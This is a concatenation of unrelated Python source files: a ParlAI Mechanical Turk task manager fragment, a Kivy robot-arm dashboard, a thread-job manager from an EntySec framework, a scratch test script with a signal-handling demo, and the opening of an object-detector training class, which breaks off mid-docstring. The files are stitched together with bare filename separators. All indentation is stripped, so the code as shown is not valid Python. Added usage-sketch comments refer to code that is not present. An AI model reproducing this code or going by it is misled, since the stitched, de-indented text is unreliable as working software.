# Ensure all threads are cleaned and state and HITs are handled
if self.is_shutdown and not force:
return
self.is_shutdown = True
try:
self.expire_all_unassigned_hits()
self._expire_onboarding_pool()
self._expire_agent_pool()
self._wait_for_task_expirations()
for assignment_id in self.assignment_to_onboard_thread:
self.assignment_to_onboard_thread[assignment_id].join()
except BaseException:
pass
finally:
if self.server_task_name is not None:
server_utils.delete_server(self.server_task_name,
self.opt['local'])
if self.topic_arn is not None:
mturk_utils.delete_sns_topic(self.topic_arn)
if self.opt['unique_worker'] and not self.opt['unique_qual_name']:
mturk_utils.delete_qualification(self.unique_qual_id,
self.is_sandbox)
if self.socket_manager is not None:
self.socket_manager.shutdown()
if self.logging_permitted and not self.is_sandbox and \
not self.is_test:
self._upload_worker_data()
if self.worker_manager is not None:
self.worker_manager.shutdown()
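# --- Hedged lifecycle sketch (comments only; added for illustration) ---
# Typical order of calls for a run, inferred from the state assertions in the
# lifecycle methods above (`create_hits` is referenced above and assumed to be
# defined elsewhere in this class):
#   manager = MTurkManager(opt, mturk_agent_ids)
#   manager.setup_server()             # -> STATE_SERVER_ALIVE
#   manager.start_new_run()            # -> STATE_INIT_RUN
#   manager.ready_to_accept_workers()  # -> STATE_ACCEPTING_WORKERS
#   manager.create_hits()              # -> STATE_HITS_MADE
#   manager.start_task(eligibility_function, assign_role_function, task_function)
#   manager.shutdown()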
# MTurk Agent Interaction Functions #
def force_expire_hit(self, worker_id, assign_id, text=None, ack_func=None):
"""Send a command to expire a hit to the provided agent, update State
to reflect that the HIT is now expired
"""
# Expire in the state
agent = self.worker_manager._get_agent(worker_id, assign_id)
if agent is not None:
if agent.is_final():
return
agent.set_status(AssignState.STATUS_EXPIRED)
agent.hit_is_expired = True
if ack_func is None:
def use_ack_func(*args):
self.socket_manager.close_channel(
'{}_{}'.format(worker_id, assign_id))
else:
def use_ack_func(*args):
ack_func(*args)
self.socket_manager.close_channel(
'{}_{}'.format(worker_id, assign_id))
# Send the expiration command
if text is None:
text = ('This HIT is expired, please return and take a new '
'one if you\'d like to work on this task.')
data = {'text': data_model.COMMAND_EXPIRE_HIT, 'inactive_text': text}
self.send_command(worker_id, assign_id, data, ack_func=use_ack_func)
def handle_turker_timeout(self, worker_id, assign_id):
"""To be used by the MTurk agent when the worker doesn't send a message
within the expected window.
"""
# Expire the hit for the disconnected user
text = ('You haven\'t entered a message for too long. As these HITs '
'often require real-time interaction, this HIT has '
'been expired and you have been considered disconnected. '
'Disconnect too frequently and you will be blocked from '
'working on these HITs in the future.')
self.force_expire_hit(worker_id, assign_id, text)
# Send the disconnect event to all workers in the convo
self._handle_agent_disconnect(worker_id, assign_id)
def send_message(self, receiver_id, assignment_id, data,
blocking=True, ack_func=None):
"""Send a message through the socket manager,
update conversation state
"""
data = data.copy() # Ensure data packet is sent in current state
data['type'] = data_model.MESSAGE_TYPE_MESSAGE
# Force messages to have a unique ID
if 'message_id' not in data:
data['message_id'] = str(uuid.uuid4())
conversation_id = None
agent = self.worker_manager._get_agent(receiver_id, assignment_id)
if agent is not None:
conversation_id = agent.conversation_id
event_id = shared_utils.generate_event_id(receiver_id)
packet = Packet(
event_id,
Packet.TYPE_MESSAGE,
self.socket_manager.get_my_sender_id(),
receiver_id,
assignment_id,
data,
conversation_id=conversation_id,
blocking=blocking,
ack_func=ack_func
)
shared_utils.print_and_log(
logging.INFO,
'Manager sending: {}'.format(packet),
should_print=self.opt['verbose']
)
# Push outgoing message to the message thread to be able to resend
# on a reconnect event
if agent is not None:
agent.append_message(packet.data)
self.socket_manager.queue_packet(packet)
return data['message_id']
def send_command(self, receiver_id, assignment_id, data, blocking=True,
ack_func=None):
"""Sends a command through the socket manager,
update conversation state
"""
data['type'] = data_model.MESSAGE_TYPE_COMMAND
event_id = shared_utils.generate_event_id(receiver_id)
packet = Packet(
event_id,
Packet.TYPE_MESSAGE,
self.socket_manager.get_my_sender_id(),
receiver_id,
assignment_id,
data,
blocking=blocking,
ack_func=ack_func
)
agent = self.worker_manager._get_agent(receiver_id, assignment_id)
if (data['text'] != data_model.COMMAND_CHANGE_CONVERSATION and
data['text'] != data_model.COMMAND_RESTORE_STATE and
agent is not None):
# Append last command, as it might be necessary to restore state
agent.set_last_command(packet.data)
self.socket_manager.queue_packet(packet)
def mark_workers_done(self, workers):
"""Mark a group of agents as done to keep state consistent"""
for agent in workers:
if self.is_unique:
assert self.unique_qual_name is not None, \
'Unique qual name must not be none to use is_unique'
self.give_worker_qualification(
agent.worker_id,
self.unique_qual_name,
)
if not agent.is_final():
agent.set_status(AssignState.STATUS_DONE)
if self.max_hits_per_worker > 0:
worker_state = self.worker_manager._get_worker(agent.worker_id)
completed_assignments = worker_state.completed_assignments()
assert self.unique_qual_name is not None, 'Unique qual name ' \
'must not be none to use max_hits_per_worker'
if completed_assignments >= self.max_hits_per_worker:
self.give_worker_qualification(
agent.worker_id,
self.unique_qual_name,
)
if self.has_time_limit:
self._log_working_time(agent)
def free_workers(self, workers):
"""End completed worker threads"""
for agent in workers:
self.socket_manager.close_channel(agent.get_connection_id())
# Amazon MTurk Server Functions #
def get_agent_work_status(self, assignment_id):
return self.worker_manager.get_agent_work_status(assignment_id)
def get_qualification_list(self, qualifications=None):
if self.qualifications is not None:
return self.qualifications.copy()
if qualifications is None:
qualifications = []
if not self.is_sandbox and not self.is_test:
try:
import parlai_internal.mturk.configs as local_configs
qualifications = \
local_configs.set_default_qualifications(qualifications)
except Exception:
# not all users will be drawing configs from internal settings
pass
if self.opt['disconnect_qualification'] is not None:
block_qual_id = mturk_utils.find_or_create_qualification(
self.opt['disconnect_qualification'],
'A soft ban from using a ParlAI-created HIT due to frequent '
'disconnects from conversations, leading to negative '
'experiences for other Turkers and for the requester.',
self.is_sandbox,
)
assert block_qual_id is not None, (
'Hits could not be created as disconnect qualification could '
'not be acquired. Shutting down server.'
)
qualifications.append({
'QualificationTypeId': block_qual_id,
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept'
})
# Add the soft block qualification if it has been specified
if self.opt['block_qualification'] is not None:
block_qual_id = mturk_utils.find_or_create_qualification(
self.opt['block_qualification'],
'A soft ban from this ParlAI-created HIT at the requesters '
'discretion. Generally used to restrict how frequently a '
'particular worker can work on a particular task.',
self.is_sandbox,
)
assert block_qual_id is not None, (
'Hits could not be created as block qualification could not be'
' acquired. Shutting down server.'
)
qualifications.append({
'QualificationTypeId': block_qual_id,
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept'
})
if self.has_time_limit:
block_qual_name = '{}-max-daily-time'.format(self.task_group_id)
if self.opt['max_time_qual'] is not None:
block_qual_name = self.opt['max_time_qual']
self.max_time_qual = block_qual_name
block_qual_id = mturk_utils.find_or_create_qualification(
block_qual_name,
'A soft ban from working on this HIT or HITs by this '
'requester based on a maximum amount of daily work time set '
'by the requester.',
self.is_sandbox,
)
assert block_qual_id is not None, (
'Hits could not be created as a time block qualification could'
' not be acquired. Shutting down server.'
)
qualifications.append({
'QualificationTypeId': block_qual_id,
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept'
})
if self.is_unique or self.max_hits_per_worker > 0:
self.unique_qual_name = self.opt.get('unique_qual_name')
if self.unique_qual_name is None:
self.unique_qual_name = self.task_group_id + '_max_submissions'
self.unique_qual_id = mturk_utils.find_or_create_qualification(
self.unique_qual_name,
'Prevents workers from completing a task too frequently',
self.is_sandbox,
)
qualifications.append({
'QualificationTypeId': self.unique_qual_id,
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept'
})
self.qualifications = qualifications
return qualifications.copy()
def create_additional_hits(self, num_hits, qualifications=None):
"""Handle creation for a specific number of hits/assignments
Put created HIT ids into the hit_id_list
"""
shared_utils.print_and_log(logging.INFO,
'Creating {} hits...'.format(num_hits))
qualifications = self.get_qualification_list(qualifications)
self.opt['assignment_duration_in_seconds'] = self.opt.get(
'assignment_duration_in_seconds', 30 * 60)
hit_type_id = mturk_utils.create_hit_type(
hit_title=self.opt['hit_title'],
hit_description='{} (ID: {})'.format(self.opt['hit_description'],
self.task_group_id),
hit_keywords=self.opt['hit_keywords'],
hit_reward=self.opt['reward'],
# Set to 30 minutes by default
assignment_duration_in_seconds=self.opt.get(
'assignment_duration_in_seconds', 30 * 60),
is_sandbox=self.opt['is_sandbox'],
qualifications=qualifications,
auto_approve_delay=self.auto_approve_delay,
)
mturk_chat_url = '{}/chat_index?task_group_id={}'.format(
self.server_url,
self.task_group_id
)
shared_utils.print_and_log(logging.INFO, mturk_chat_url)
mturk_page_url = None
if self.topic_arn is not None:
mturk_utils.subscribe_to_hits(
hit_type_id,
self.is_sandbox,
self.topic_arn
)
for _i in range(num_hits):
mturk_page_url, hit_id, mturk_response = \
mturk_utils.create_hit_with_hit_type(
page_url=mturk_chat_url,
hit_type_id=hit_type_id,
num_assignments=1,
is_sandbox=self.is_sandbox
)
if self.db_logger is not None:
self.db_logger.log_hit_status(mturk_response)
self.hit_id_list.append(hit_id)
return mturk_page_url
def create_hits(self, qualifications=None):
"""Create hits based on the managers current config, return hit url"""
shared_utils.print_and_log(logging.INFO, 'Creating HITs...', True)
if self.task_state < self.STATE_ACCEPTING_WORKERS:
shared_utils.print_and_log(
logging.WARN,
'You should be calling `ready_to_accept_workers` before '
'`create_hits` to ensure that the socket is connected before '
'hits are added. This will be enforced in future versions.',
True
)
if self.opt['max_connections'] == 0:
mturk_page_url = self.create_additional_hits(
num_hits=self.required_hits,
qualifications=qualifications,
)
else:
mturk_page_url = self.create_additional_hits(
num_hits=min(self.required_hits, self.opt['max_connections']),
qualifications=qualifications,
)
shared_utils.print_and_log(logging.INFO,
'Link to HIT: {}\n'.format(mturk_page_url),
should_print=True)
shared_utils.print_and_log(
logging.INFO,
'Waiting for Turkers to respond... (Please don\'t close'
' your laptop or put your computer into sleep or standby mode.)\n',
should_print=True
)
self.task_state = self.STATE_HITS_MADE
return mturk_page_url
def get_hit(self, hit_id):
"""Get hit from mturk by hit_id"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
hit = client.get_hit(HITId=hit_id)
if self.db_logger is not None:
try:
self.db_logger.log_hit_status(hit)
except Exception:
pass
return hit
def get_assignment(self, assignment_id):
"""Gets assignment from mturk by assignment_id. Only works if the
assignment is in a completed state
"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
return client.get_assignment(AssignmentId=assignment_id)
def get_assignments_for_hit(self, hit_id):
"""Get completed assignments for a hit"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
assignments_info = client.list_assignments_for_hit(HITId=hit_id)
return assignments_info.get('Assignments', [])
def expire_all_unassigned_hits(self):
"""Move through the whole hit_id list and attempt to expire the
HITs, though this only immediately expires those that aren't assigned.
"""
# TODO note and mark assigned hits as ones to be expired later
shared_utils.print_and_log(logging.INFO,
'Expiring all unassigned HITs...',
should_print=not self.is_test)
completed_ids = self.worker_manager.get_complete_hits()
for hit_id in self.hit_id_list:
if hit_id not in completed_ids:
# TODO get confirmation that the HIT is actually expired
mturk_utils.expire_hit(self.is_sandbox, hit_id)
def approve_work(self, assignment_id):
"""approve work for a given assignment through the mturk client"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
client.approve_assignment(AssignmentId=assignment_id)
if self.db_logger is not None:
self.db_logger.log_approve_assignment(assignment_id)
shared_utils.print_and_log(
logging.INFO,
'Assignment {} approved.'
''.format(assignment_id),
)
def reject_work(self, assignment_id, reason):
"""reject work for a given assignment through the mturk client"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
client.reject_assignment(
AssignmentId=assignment_id,
RequesterFeedback=reason
)
if self.db_logger is not None:
self.db_logger.log_reject_assignment(assignment_id)
shared_utils.print_and_log(
logging.INFO,
'Assignment {} rejected for reason {}.'
''.format(assignment_id, reason),
)
def approve_assignments_for_hit(self, hit_id, override_rejection=False):
"""Approve work for assignments associated with a given hit, through
mturk client
"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
assignments = self.get_assignments_for_hit(hit_id)
for assignment in assignments:
assignment_id = assignment['AssignmentId']
client.approve_assignment(AssignmentId=assignment_id,
OverrideRejection=override_rejection)
def block_worker(self, worker_id, reason):
"""Block a worker by id using the mturk client, passes reason along"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
client.create_worker_block(WorkerId=worker_id, Reason=reason)
shared_utils.print_and_log(
logging.INFO,
'Worker {} blocked for reason {}.'
''.format(worker_id, reason),
)
def soft_block_worker(self, worker_id, qual='block_qualification'):
"""Soft block a worker by giving the worker the block qualification"""
qual_name = self.opt.get(qual, None)
assert qual_name is not None, ('No qualification {} has been specified '
'in opt'.format(qual))
self.give_worker_qualification(worker_id, qual_name)
def un_soft_block_worker(self, worker_id, qual='block_qualification'):
"""Remove a soft block from a worker by removing a block qualification
from the worker"""
qual_name = self.opt.get(qual, None)
assert qual_name is not None, ('No qualification {} has been specified '
'in opt'.format(qual))
self.remove_worker_qualification(worker_id, qual_name)
def give_worker_qualification(self, worker_id, qual_name, qual_value=None):
"""Give a worker a particular qualification"""
qual_id = mturk_utils.find_qualification(qual_name, self.is_sandbox)
if qual_id is False or qual_id is None:
shared_utils.print_and_log(
logging.WARN,
'Could not give worker {} qualification {}, as the '
'qualification could not be found to exist.'
''.format(worker_id, qual_name),
should_print=True
)
return
mturk_utils.give_worker_qualification(worker_id, qual_id, qual_value,
self.is_sandbox)
shared_utils.print_and_log(
logging.INFO,
'gave {} qualification {}'.format(worker_id, qual_name),
should_print=True
)
def remove_worker_qualification(self, worker_id, qual_name, reason=''):
"""Remove a qualification from a worker"""
qual_id = mturk_utils.find_qualification(qual_name, self.is_sandbox)
if qual_id is False or qual_id is None:
shared_utils.print_and_log(
logging.WARN,
'Could not remove from worker {} qualification {}, as the '
'qualification could not be found to exist.'
''.format(worker_id, qual_name),
should_print=True
)
return
try:
mturk_utils.remove_worker_qualification(worker_id, qual_id,
self.is_sandbox, reason)
shared_utils.print_and_log(
logging.INFO,
'removed {}\'s qualification {}'.format(worker_id, qual_name),
should_print=True
)
except Exception as e:
shared_utils.print_and_log(
logging.WARN if not self.has_time_limit else logging.INFO,
'removing {}\'s qualification {} failed with error {}. This '
'can be because the worker didn\'t have that qualification.'
''.format(worker_id, qual_name, repr(e)),
should_print=True
)
def create_qualification(self, qualification_name, description,
can_exist=True):
"""Create a new qualification. If can_exist is set, simply return
the ID of the existing qualification rather than throw an error
"""
if not can_exist:
qual_id = mturk_utils.find_qualification(qualification_name,
self.is_sandbox)
if qual_id is not None:
shared_utils.print_and_log(
logging.WARN,
'Could not create qualification {}, as it already exists'
''.format(qualification_name),
should_print=True
)
return None
return mturk_utils.find_or_create_qualification(
qualification_name,
description,
self.is_sandbox
)
def pay_bonus(self, worker_id, bonus_amount, assignment_id, reason,
unique_request_token):
"""Handles paying bonus to a turker, fails for insufficient funds.
Returns True on success and False on failure
"""
total_cost = mturk_utils.calculate_mturk_cost(
payment_opt={'type': 'bonus', 'amount': bonus_amount}
)
if not mturk_utils.check_mturk_balance(balance_needed=total_cost,
is_sandbox=self.is_sandbox):
shared_utils.print_and_log(
logging.WARN,
'Cannot pay bonus. Reason: Insufficient '
'funds in your MTurk account.',
should_print=True
)
return False
client = mturk_utils.get_mturk_client(self.is_sandbox)
# unique_request_token may be useful for handling future network errors
client.send_bonus(
WorkerId=worker_id,
BonusAmount=str(bonus_amount),
AssignmentId=assignment_id,
Reason=reason,
UniqueRequestToken=unique_request_token
)
shared_utils.print_and_log(
logging.INFO,
'Paid ${} bonus to WorkerId: {}'.format(
bonus_amount,
worker_id
)
)
return True
def email_worker(self, worker_id, subject, message_text):
"""Send an email to a worker through the mturk client"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
response = client.notify_workers(
Subject=subject,
MessageText=message_text,
WorkerIds=[worker_id]
)
if len(response['NotifyWorkersFailureStatuses']) > 0:
failure_message = response['NotifyWorkersFailureStatuses'][0]
return {'failure': failure_message['NotifyWorkersFailureMessage']}
else:
return {'success': True}
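# --- Illustrative usage sketch (not part of the original module) ---
# A minimal, hedged example of how the review helpers above might be
# combined once a task run has finished. `manager` and `completed_agents`
# are hypothetical caller-side objects, the bonus amount and reason are
# placeholders, and `uuid` is assumed to be imported at the top of this
# module (its use in send_message above suggests it is).
def _example_review_completed_work(manager, completed_agents):
    """Approve every submitted assignment and pay a small bonus (sketch)."""
    for agent in completed_agents:
        if manager.get_agent_work_status(agent.assignment_id) == 'Submitted':
            manager.approve_work(agent.assignment_id)
            manager.pay_bonus(
                worker_id=agent.worker_id,
                bonus_amount=0.50,
                assignment_id=agent.assignment_id,
                reason='Thanks for completing the task!',
                unique_request_token=str(uuid.uuid4()),
            )
    manager.shutdown()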
|
main.py
|
import cv2
from os import environ
environ["KIVY_CAMERA"] = 'opencv'
environ['KIVY_WINDOW'] = 'sdl2'
environ['KIVY_VIDEO'] = 'ffmpeg'
environ['KIVY_IMAGE'] = 'sdl2'
from kivy import Config
Config.set('graphics', 'width', '1080')
Config.set('graphics', 'height', '720')
Config.set('graphics', 'maxfps', '60')
from kivymd.app import MDApp
from kivy.graphics.texture import Texture
import kivy
from robot import Robot
from joystick import Joystick
from kivy.clock import Clock
from threading import Thread
from numpy import clip
from ctypes import *
#ik_lib = CDLL("/home/pi/Desktop/DOFBot-easy-tool/ik.so")
class Point(Structure):
_fields_ = [
('x', c_float),
('y', c_float),
('z', c_float)
]
def PytoC(arr):
seq = c_int * len(arr)
return seq(*arr)
#targets = [90, 90, 90, 90, 90, 90]
class DashboardApp(MDApp):
def __init__(self):
super(DashboardApp, self).__init__()
self.robot = Robot()
Clock.schedule_interval(self.display_axis_data, 0.1)
#Clock.schedule_interval(self.viewfinder, 0.066)
#Clock.schedule_interval(self.update_motors, 0.05)
#self.control_pad = Joystick()
#Clock.schedule_interval(self.control_pad.poll_buttons, 0.1)
self.slider_cache = []
self.robot.arm.Arm_serial_set_torque(1)
def build(self, *args, **kwargs):
super(DashboardApp, self).build(*args, **kwargs)
Thread(target=self.robot.poll_axes).start()
def viewfinder(self, *args, **kwargs):
# ret, frame = self.camera.read()
# cv2.imshow("CV2 Image", frame)
##buf1 = cv2.flip(frame, 0)
# buf = buf1.tobytes()
# self.camTex.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')
# self.root.ids['camera'].texture = self.camTex
pass
def control(self):
#self.control_pad.poll_buttons()
if not self.robot.disable_move:
self.root.ids['ax1'].value -= round(self.control_pad.axes[0] * 100) * 0.05
self.root.ids['ax2'].value += round(self.control_pad.axes[1] * 100) * 0.05
self.root.ids['ax5'].value += round(self.control_pad.axes[2] * 100) * 0.05
self.root.ids['ax3'].value += round(self.control_pad.axes[3] * 100) * 0.05
self.root.ids['ax4'].value += round(self.control_pad.axes[4] * 100) * 0.05
self.root.ids['ax6'].value += round(self.control_pad.axes[5] * 100) * 0.1
restrict = clip([self.root.ids[f'ax{i + 1}'].value for i in range(0, 6)], -90, 90)
def display_axis_data(self, *args, **kwargs):
angles = self.robot.axes
for i in range(0, 5):
self.root.ids[f'ax{i + 1}_readout'].text = f"Axa {i + 1}: {angles[i]}°"
def update_motors(self, *args, **kwargs):
self.control()
targets = [int(self.root.ids[f"ax{i + 1}"].value + 90) for i in range(0, 6)]
self.robot.move(targets)
#tgt = Point.from_address( ik_lib.inverse_kinematics(PytoC(targets), PytoC([1, 1, 1, 1, 1])) )
#print(f"{tgt.x} {tgt.y} {tgt.z}")
#ik_lib.free_point(byref(tgt))
def mde_lrn(self):
Thread(target=self.robot.toggle_learn).start()
def add(self):
self.robot.add_step()
self.root.ids['stepcount'].text = str(int(self.root.ids['stepcount'].text) + 1)
def rm(self):
exit_code = self.robot.remove_step()
if exit_code:
self.root.ids['stepcount'].text = str(int(self.root.ids['stepcount'].text) - 1)
def strt(self):
#print("here")
Thread(target=self.robot.execute).start()
def on_stop(self):
self.robot.alive = False
if __name__ == '__main__':
DashboardApp().run()
|
jobs.py
|
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import ctypes
import os
import sys
import threading
from core.base.exceptions import Exceptions
from core.base.storage import LocalStorage
from core.cli.badges import Badges
from core.cli.tables import Tables
from core.modules.modules import Modules
class Jobs:
def __init__(self):
self.exceptions = Exceptions()
self.tables = Tables()
self.badges = Badges()
self.local_storage = LocalStorage()
self.modules = Modules()
self.job_process = None
def stop_dead(self):
jobs = self.local_storage.get("jobs")
if jobs:
for job_id in list(jobs):
if not jobs[job_id]['job_process'].is_alive():
self.delete_job(job_id)
def check_jobs(self):
if not self.local_storage.get("jobs"):
return True
return False
def check_module_job(self, module_name):
jobs = self.local_storage.get("jobs")
if jobs:
for job_id in jobs.keys():
if jobs[job_id]['module_name'] == module_name:
return True
return False
def exit_jobs(self):
if self.check_jobs():
return True
self.badges.output_warning("You have some running jobs.")
if self.badges.input_question("Exit anyway? [y/N] ").lower() in ['yes', 'y']:
self.badges.output_process("Stopping all jobs...")
self.stop_all_jobs()
return True
return False
def stop_all_jobs(self):
if not self.check_jobs():
for job_id in list(self.local_storage.get("jobs").keys()):
self.delete_job(job_id)
def stop_job(self, job):
if job.is_alive():
exc = ctypes.py_object(SystemExit)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(job.ident), exc)
if res == 0:
raise self.exceptions.GlobalException
if res > 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(job.ident, None)
raise self.exceptions.GlobalException
def start_job(self, job_function, job_arguments):
self.job_process = threading.Thread(target=job_function, args=job_arguments)
self.job_process.daemon = True
self.job_process.start()
def delete_job(self, job_id):
if not self.check_jobs():
job_id = int(job_id)
if job_id in list(self.local_storage.get("jobs").keys()):
try:
self.stop_job(self.local_storage.get("jobs")[job_id]['job_process'])
self.local_storage.delete_element("jobs", job_id)
except Exception:
self.badges.output_error("Failed to stop job!")
else:
self.badges.output_error("Invalid job id!")
else:
self.badges.output_error("Invalid job id!")
def create_job(self, job_name, module_name, job_function, job_arguments=()):
self.start_job(job_function, job_arguments)
if not self.local_storage.get("jobs"):
self.local_storage.set("jobs", dict())
job_id = len(self.local_storage.get("jobs"))
job_data = {
job_id: {
'job_name': job_name,
'module_name': module_name,
'job_process': self.job_process
}
}
self.local_storage.update("jobs", job_data)
return job_id
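# --- Illustrative usage sketch (not part of the original module) ---
# A minimal, hedged example of scheduling a background job through the
# Jobs API above and cleaning it up afterwards. The payload function and
# its arguments are hypothetical placeholders.
def _example_job_usage():
    import time

    def payload(host, port):
        # stand-in for real long-running module work
        while True:
            time.sleep(1)

    jobs = Jobs()
    job_id = jobs.create_job("demo job", "demo/module", payload, ("127.0.0.1", 8080))
    time.sleep(5)
    jobs.delete_job(job_id)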
|
test.py
|
# from dataclasses import field
# import os
# from multiprocessing import Process
# from re import L
# from time import sleep
# import re
# def perf_monitor():
# os.system("perf stat -e instructions,cycles -C 0 -o ./record/tmp.txt sleep 5")
# # perf stat -I 1000 -e cycles -a sleep 5
# def exec_container(container, command):
# print(container + ": Start executing commands...")
# cmd = "docker exec " + container + " " + command
# print(cmd)
# os.system(cmd)
# print(container + ": Finish.")
# if __name__ == "__main__":
# # create processes
# p1 = Process(target=exec_container, args=("container1", "python3 ./aws/cpu-memory/linpack/lambda_function.py -n=2000"),)
# p2 = Process(target=exec_container, args=("container2", "python3 ./aws/cpu-memory/ml_lr_prediction/lambda_function.py -dataset_train_object_key=reviews10mb.csv -dataset_test_object_key=reviews20mb.csv"),)
# p3 = Process(target=perf_monitor,)
# # start running
# p1.start()
# p2.start()
# p3.start()
# # wait
# p1.join()
# p2.join()
# p3.join()
# print("Process finish.")
# # read the specific line
# ips_line = 6
# file = open("./record/tmp.txt", "r")
# count = 0
# while count < ips_line:
# line = file.readline()
# count += 1
# print(line)
# # find the number
# regex = re.compile(r'\d+')
# nums = regex.findall(line)
# instructions = 0
# for num in nums[:-2]:
# print(num)
# instructions = instructions * 1000 + int(num)
# print(instructions)
# line = file.readline()
# nums = regex.findall(line)
# cycles = 0
# for num in nums:
# cycles = cycles * 1000 + int(num)
# print(cycles)
# ans = instructions / cycles
# # write as a record
# info = "n,train,test,ipc"
# os.system("echo " + info + " >> ./record/5_7.csv")
# info = "2000,10,20," + str(round(ans, 4))
# os.system("echo " + info + " >> ./record/5_7.csv")
# # print("Record finish.")
# import multiprocessing
# import os
# import signal
# import time
# def func(i):
# while True:
# a = i
# print("the {} dog".format(os.getpid()))
# # array[0] = a
# # a = i
# process_list = []
# for i in range(10):
# process = multiprocessing.Process(target=func, args=(i,), daemon=False)
# process_list.append(process)
# process.start()
# time.sleep(0.2) # wait for the processes to run
# # print(num)
# # print(num_array[0])
# time.sleep(5)
# for process in process_list:
# process.te
# a = [[1,2], [3,4]]
# b = []
# b.append(a)
# b.append(a)
# a = []
# print(b)
#!/usr/bin/env python3
# coding=utf-8
import os
import time
import signal
import traceback
def handle_SIGUSR1(signum, frame):
print("what are you doing")
def main():
signal.signal(signal.SIGUSR1, handle_SIGUSR1) # register handle_SIGUSR1 as the handler for SIGUSR1
print(signal.getsignal(signal.SIGUSR1)) # print the current handler for SIGUSR1
time.sleep(3) # alternatively, use signal.pause()
os.kill(os.getpid(), signal.SIGUSR1) # send SIGUSR1 to the current process
time.sleep(3)
print('done')
if __name__ == '__main__':
main()
|
train_detector.py
|
import os
import json
import torch
import numpy as np
import queue
import pprint
import random
import argparse
import importlib
import threading
import traceback
import torch.distributed as dist
import torch.multiprocessing as mp
from tqdm import tqdm
from torch.multiprocessing import Process, Queue, Pool
from core.dbs import datasets
from core.utils import stdout_to_tqdm
from core.config import SystemConfig
from core.sample import data_sampling_func
from core.nnet.py_factory import NetworkFactory
def prefetch_data(system_config, db, queue, sample_data, data_aug):
ind = 0
print("start prefetching data...")
np.random.seed(os.getpid())
while True:
try:
data, ind = sample_data(system_config, db, ind, data_aug=data_aug)
queue.put(data)
except Exception as e:
traceback.print_exc()
raise e
def _pin_memory(ts):
if type(ts) is list:
return [t.pin_memory() for t in ts]
return ts.pin_memory()
def pin_memory(data_queue, pinned_data_queue, sema):
while True:
data = data_queue.get()
data["xs"] = [_pin_memory(x) for x in data["xs"]]
data["ys"] = [_pin_memory(y) for y in data["ys"]]
pinned_data_queue.put(data)
if sema.acquire(blocking=False):
return
def init_parallel_jobs(system_config, dbs, queue, fn, data_aug):
tasks = [Process(target=prefetch_data, args=(system_config, db, queue, fn, data_aug)) for db in dbs]
for task in tasks:
task.daemon = True
task.start()
return tasks
def terminate_tasks(tasks):
for task in tasks:
task.terminate()
class Detector():
'''
Class to train a detector
Args:
verbose (int): Set verbosity levels
0 - Print Nothing
1 - Print desired details
'''
def __init__(self, verbose=1):
self.system_dict = {};
self.system_dict["verbose"] = verbose;
self.system_dict["local"] = {};
self.system_dict["dataset"] = {};
self.system_dict["dataset"]["train"] = {};
self.system_dict["dataset"]["val"] = {};
self.system_dict["dataset"]["val"]["status"] = False;
self.system_dict["dataset"]["params"] = {};
self.system_dict["dataset"]["params"]["workers"] = 4;
self.system_dict["model"] = {};
self.system_dict["model"]["params"] = {};
self.system_dict["model"]["params"]["cfg_file"] = "CornerNet_Saccade";
self.system_dict["model"]["params"]["initialize"] = False;
self.system_dict["model"]["params"]["distributed"] = False;
self.system_dict["model"]["params"]["world_size"] = 0;
self.system_dict["model"]["params"]["rank"] = 0;
self.system_dict["model"]["params"]["dist_url"] = None;
self.system_dict["model"]["params"]["dist_backend"] = "nccl";
self.system_dict["model"]["params"]["use_gpu"] = True;
self.system_dict["training"] = {};
self.system_dict["training"]["params"] = {};
self.system_dict["training"]["params"]["start_iter"] = 0;
self.system_dict["training"]["params"]["gpu"] = None;
def Train_Dataset(self, root_dir, coco_dir, img_dir, set_dir, batch_size=4, use_gpu=True, num_workers=4):
'''
User function: Set training dataset parameters
Dataset Directory Structure
root_dir
   |
   |------coco_dir
   |          |
   |          |----img_dir
   |          |       |
   |          |       |------<set_dir_train> (set_dir) (Train)
   |          |                   |
   |          |                   |---------img1.jpg
   |          |                   |---------img2.jpg
   |          |                   |---------..........(and so on)
   |          |
   |          |---annotations
   |                  |
   |                  |--------------------instances_Train.json (instances_<set_dir_train>.json)
   |                  |--------------------classes.txt
- instances_Train.json -> In proper COCO format
- classes.txt -> A list of classes in alphabetical order
For TrainSet
- root_dir = "../sample_dataset";
- coco_dir = "kangaroo";
- img_dir = "images";
- set_dir = "Train";
Note: The annotation file name must match the set_dir name
Args:
root_dir (str): Path to root directory containing coco_dir
coco_dir (str): Name of coco_dir containing image folder and annotation folder
img_dir (str): Name of folder containing all training and validation folders
set_dir (str): Name of folder containing all training images
batch_size (int): Mini batch sampling size for training epochs
use_gpu (bool): If True use GPU else run on CPU
